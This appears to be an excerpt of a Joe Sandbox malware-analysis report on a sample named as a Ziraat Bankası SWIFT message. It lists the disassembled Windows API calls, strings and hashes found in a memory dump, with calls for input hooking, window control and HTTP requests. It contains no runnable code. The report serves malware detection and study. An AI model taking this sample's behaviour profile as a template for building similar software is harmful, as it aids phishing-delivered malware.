                                                                                                                                                        • API ID: MessageSend$CtrlParent
                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                        • API String ID: 1383977212-1403004172
                                                                                                                                                        • Opcode ID: 560b6d46eba75a2cbca4ffef807f13e8499b40f5d1c8995e955f120c95cc5b52
                                                                                                                                                        • Instruction ID: 546d012d7965d3a123ee9c075afde5f08544fa55c92ade9dfff0e9983601fef7
                                                                                                                                                        • Opcode Fuzzy Hash: 560b6d46eba75a2cbca4ffef807f13e8499b40f5d1c8995e955f120c95cc5b52
                                                                                                                                                        • Instruction Fuzzy Hash: 6F218374900104BFDB04EBA4DC86EFEBBB5EF49310F10411AF691972E2DBB59959DB20
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 000BBA73
                                                                                                                                                        • GetDlgCtrlID.USER32 ref: 000BBA7E
                                                                                                                                                        • GetParent.USER32 ref: 000BBA9A
                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 000BBA9D
                                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 000BBAA6
                                                                                                                                                        • GetParent.USER32(?), ref: 000BBAC2
                                                                                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 000BBAC5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$CtrlParent
                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                        • API String ID: 1383977212-1403004172
                                                                                                                                                        • Opcode ID: aa38d6313754e0b7ccf49480f015d10d7fa0aeb6cffe8da0d4e86501bdda17be
                                                                                                                                                        • Instruction ID: 32a9dff13f26f52ca3ac372e95a447ce60c39d850e3346143207c589dc6cb894
                                                                                                                                                        • Opcode Fuzzy Hash: aa38d6313754e0b7ccf49480f015d10d7fa0aeb6cffe8da0d4e86501bdda17be
                                                                                                                                                        • Instruction Fuzzy Hash: 202192B4A40108BFDB01AFA4DC85EFEBBB9FF49300F144016F591A7292EBB559599B20
                                                                                                                                                        APIs
                                                                                                                                                        • GetParent.USER32 ref: 000BBAE3
                                                                                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 000BBAF8
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000BBB0A
                                                                                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 000BBB85
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                        • API String ID: 1704125052-3381328864
                                                                                                                                                        • Opcode ID: dd4879feaa0fec3591822f33f27a117ac7fb91568524a5526a57f6b32dd380a9
                                                                                                                                                        • Instruction ID: 4aefe534d85525eb6f18712813e6087b3f07fb59370c9f4524acfb9d1bb6cc26
                                                                                                                                                        • Opcode Fuzzy Hash: dd4879feaa0fec3591822f33f27a117ac7fb91568524a5526a57f6b32dd380a9
                                                                                                                                                        • Instruction Fuzzy Hash: 44110276608307FFFA207670EC06DEA379C9B12760F200022FA08E68DAEFE2A8514514
                                                                                                                                                        APIs
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 000DB2D5
                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 000DB302
                                                                                                                                                        • CoUninitialize.OLE32 ref: 000DB30C
                                                                                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 000DB40C
                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 000DB539
                                                                                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 000DB56D
                                                                                                                                                        • CoGetObject.OLE32(?,00000000,0010D91C,?), ref: 000DB590
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 000DB5A3
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 000DB623
                                                                                                                                                        • VariantClear.OLEAUT32(0010D91C), ref: 000DB633
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2395222682-0
                                                                                                                                                        • Opcode ID: a9ade5a088ba3b3f76b4cd9bea1553a0e533f33bddd1f553a5ae0332f5f0f485
                                                                                                                                                        • Instruction ID: 61eb88e897ef5fa88de23e81e6a573a754650e991ba64b9cf5cb2c19e218a3d4
                                                                                                                                                        • Opcode Fuzzy Hash: a9ade5a088ba3b3f76b4cd9bea1553a0e533f33bddd1f553a5ae0332f5f0f485
                                                                                                                                                        • Instruction Fuzzy Hash: 07C11371608301EFC700EF68D884A6AB7E9BF89348F05491EF58A9B351DB71ED45CB62
                                                                                                                                                        APIs
                                                                                                                                                        • __lock.LIBCMT ref: 000AACC1
                                                                                                                                                          • Part of subcall function 000A7CF4: __mtinitlocknum.LIBCMT ref: 000A7D06
                                                                                                                                                          • Part of subcall function 000A7CF4: EnterCriticalSection.KERNEL32(00000000,?,000A7ADD,0000000D), ref: 000A7D1F
                                                                                                                                                        • __calloc_crt.LIBCMT ref: 000AACD2
                                                                                                                                                          • Part of subcall function 000A6986: __calloc_impl.LIBCMT ref: 000A6995
                                                                                                                                                          • Part of subcall function 000A6986: Sleep.KERNEL32(00000000,000003BC,0009F507,?,0000000E), ref: 000A69AC
                                                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 000AACED
                                                                                                                                                        • GetStartupInfoW.KERNEL32(?,00136E28,00000064,000A5E91,00136C70,00000014), ref: 000AAD46
                                                                                                                                                        • __calloc_crt.LIBCMT ref: 000AAD91
                                                                                                                                                        • GetFileType.KERNEL32(00000001), ref: 000AADD8
                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 000AAE11
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1426640281-0
                                                                                                                                                        • Opcode ID: 5e5900eab70deaf5faeb3b086966db4b2eb34ae09c3195e348c30e16145b02c8
                                                                                                                                                        • Instruction ID: afa9305bed42f1f689c78ce678fa4050e793090d18dc363a1447d3cf631ff0ff
                                                                                                                                                        • Opcode Fuzzy Hash: 5e5900eab70deaf5faeb3b086966db4b2eb34ae09c3195e348c30e16145b02c8
                                                                                                                                                        • Instruction Fuzzy Hash: B781B671A053458FDB24CFE8D8405ADBBF0AF0B324B24426DE4A6AB7D2D7359843CB56
                                                                                                                                                        APIs
                                                                                                                                                        • __swprintf.LIBCMT ref: 000C67FD
                                                                                                                                                        • __swprintf.LIBCMT ref: 000C680A
                                                                                                                                                          • Part of subcall function 000A172B: __woutput_l.LIBCMT ref: 000A1784
                                                                                                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 000C6834
                                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 000C6840
                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 000C684D
                                                                                                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 000C686D
                                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 000C687F
                                                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 000C688E
                                                                                                                                                        • LockResource.KERNEL32(?), ref: 000C689A
                                                                                                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 000C68F9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1433390588-0
                                                                                                                                                        • Opcode ID: 06a22cd696b92367487711a870ec7389838c67dd7712251272c7221e889ac111
                                                                                                                                                        • Instruction ID: 6c66eae6a208cf2d0baac7a7f0fc2af6ee48aa623cfe0e0a3457a2089f767107
                                                                                                                                                        • Opcode Fuzzy Hash: 06a22cd696b92367487711a870ec7389838c67dd7712251272c7221e889ac111
                                                                                                                                                        • Instruction Fuzzy Hash: D831927590021ABBDB219FA0ED55EBF7BA8FF08340F004529F941D2150EB75D995DB70
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 000C4047
                                                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,000C30A5,?,00000001), ref: 000C405B
                                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 000C4062
                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000C30A5,?,00000001), ref: 000C4071
                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 000C4083
                                                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,000C30A5,?,00000001), ref: 000C409C
                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000C30A5,?,00000001), ref: 000C40AE
                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,000C30A5,?,00000001), ref: 000C40F3
                                                                                                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,000C30A5,?,00000001), ref: 000C4108
                                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,000C30A5,?,00000001), ref: 000C4113
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2156557900-0
                                                                                                                                                        • Opcode ID: 6ecde5f13e1c1f9429887990aa5de7d542f19f76cd9a9f01367ca954b880a5ae
                                                                                                                                                        • Instruction ID: c5689759dcf3b3a3f1a8cb1355bc716816874ac56d439e6efdc2c5985977f053
                                                                                                                                                        • Opcode Fuzzy Hash: 6ecde5f13e1c1f9429887990aa5de7d542f19f76cd9a9f01367ca954b880a5ae
                                                                                                                                                        • Instruction Fuzzy Hash: 43319175500204AFDB20DF54EC96F6D77EAFB55321F14800AFE54E66A0CBB599C08B60
                                                                                                                                                        APIs
                                                                                                                                                        • EnumChildWindows.USER32(?,000BCF50), ref: 000BCE90
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ChildEnumWindows
                                                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                        • API String ID: 3555792229-1603158881
                                                                                                                                                        • Opcode ID: c0f5289a8b607413149181bf65dcaddeee5bd646e810a8da01ad32147e2b4159
                                                                                                                                                        • Instruction ID: 779e8103dbe21d2ffb348b3cc7d2f7c0c4ecf7f855abaf2fe9f1ffb192cefbdc
                                                                                                                                                        • Opcode Fuzzy Hash: c0f5289a8b607413149181bf65dcaddeee5bd646e810a8da01ad32147e2b4159
                                                                                                                                                        • Instruction Fuzzy Hash: 17917370600546DBDB58EF60C482FEEFBB5BF04300F548529D569A7252DF30A95ADBE0
                                                                                                                                                        APIs
                                                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000830DC
                                                                                                                                                        • CoUninitialize.OLE32(?,00000000), ref: 00083181
                                                                                                                                                        • UnregisterHotKey.USER32(?), ref: 000832A9
                                                                                                                                                        • DestroyWindow.USER32(?), ref: 000F5079
                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 000F50F8
                                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 000F5125
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                        • String ID: close all
                                                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                                                        • Opcode ID: 2674766e35a2382414bdc43f42933a98b7ee9e7cbafd0bfa438c2faf534a1918
                                                                                                                                                        • Instruction ID: 49efff68f120862b97d8b453c8d8667b03551abd5d7ee41872881af346f9bb9d
                                                                                                                                                        • Opcode Fuzzy Hash: 2674766e35a2382414bdc43f42933a98b7ee9e7cbafd0bfa438c2faf534a1918
                                                                                                                                                        • Instruction Fuzzy Hash: CB913A302006068FC715EF24C899FA9F3B4BF44705F5582A9E68AA7662DF30AE56DF50
                                                                                                                                                        APIs
                                                                                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 0009CC15
                                                                                                                                                          • Part of subcall function 0009CCCD: GetClientRect.USER32(?,?), ref: 0009CCF6
                                                                                                                                                          • Part of subcall function 0009CCCD: GetWindowRect.USER32(?,?), ref: 0009CD37
                                                                                                                                                          • Part of subcall function 0009CCCD: ScreenToClient.USER32(?,000000FF), ref: 0009CD5F
                                                                                                                                                        • GetDC.USER32 ref: 000FD137
                                                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 000FD14A
                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 000FD158
                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 000FD16D
                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 000FD175
                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000FD200
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                        • String ID: U
                                                                                                                                                        • API String ID: 4009187628-3372436214
                                                                                                                                                        • Opcode ID: ab8babf9ce10ec75b628591f84b23524965223ae4e1ce677cdf12dc156adcb6c
                                                                                                                                                        • Instruction ID: 2cca2e719b72cc09812f3afbccef5955069aa8bb69e9fff44c111eeb2db2ccbe
                                                                                                                                                        • Opcode Fuzzy Hash: ab8babf9ce10ec75b628591f84b23524965223ae4e1ce677cdf12dc156adcb6c
                                                                                                                                                        • Instruction Fuzzy Hash: 5071BF74800209EFDF619F64C885EFE7BB6FF49310F18426AEE555A6A6C7318881EF50
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F
                                                                                                                                                          • Part of subcall function 0009B63C: GetCursorPos.USER32(000000FF), ref: 0009B64F
                                                                                                                                                          • Part of subcall function 0009B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0009B66C
                                                                                                                                                          • Part of subcall function 0009B63C: GetAsyncKeyState.USER32(00000001), ref: 0009B691
                                                                                                                                                          • Part of subcall function 0009B63C: GetAsyncKeyState.USER32(00000002), ref: 0009B69F
                                                                                                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 000EED3C
                                                                                                                                                        • ImageList_EndDrag.COMCTL32 ref: 000EED42
                                                                                                                                                        • ReleaseCapture.USER32 ref: 000EED48
                                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 000EEDF0
                                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 000EEE03
                                                                                                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 000EEEDC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                        • API String ID: 1924731296-2107944366
                                                                                                                                                        • Opcode ID: 88b1b7ae01b9ff6b2e1553f2758348745c2575eaebad4662a111421cbda5dd6d
                                                                                                                                                        • Instruction ID: 4ac6c4253c771232d299a1f47e94b072308dccb9c9c1013cb6ae29c67853927a
                                                                                                                                                        • Opcode Fuzzy Hash: 88b1b7ae01b9ff6b2e1553f2758348745c2575eaebad4662a111421cbda5dd6d
                                                                                                                                                        • Instruction Fuzzy Hash: AE519974204344AFD710EF20DC86FAA77E5FB88314F14492DF995A72E2DBB0A984CB52
                                                                                                                                                        APIs
                                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000D45FF
                                                                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 000D462B
                                                                                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 000D466D
                                                                                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 000D4682
                                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D468F
                                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 000D46BF
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 000D4706
                                                                                                                                                          • Part of subcall function 000D5052: GetLastError.KERNEL32(?,?,000D43CC,00000000,00000000,00000001), ref: 000D5067
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1241431887-3916222277
                                                                                                                                                        • Opcode ID: 83f77d9629020f8e39f654b66012b1b9df9dc4a7ea63680242e740cbc185cf28
                                                                                                                                                        • Instruction ID: c4d3eba28e20042d0c79c98c1b9379796ffb35976e80c465ad8656c9c9266248
                                                                                                                                                        • Opcode Fuzzy Hash: 83f77d9629020f8e39f654b66012b1b9df9dc4a7ea63680242e740cbc185cf28
                                                                                                                                                        • Instruction Fuzzy Hash: 11414CB1501705BFEB129F90DC89FEA7BACFF09354F004126FA469A281D7B0D9448BB5
                                                                                                                                                        APIs
                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 000EB3F4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InvalidateRect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 634782764-0
                                                                                                                                                        • Opcode ID: 3fd43cfd2ec402a919706e1df4381ee399b213161d81bf942f67d7ddf85e8270
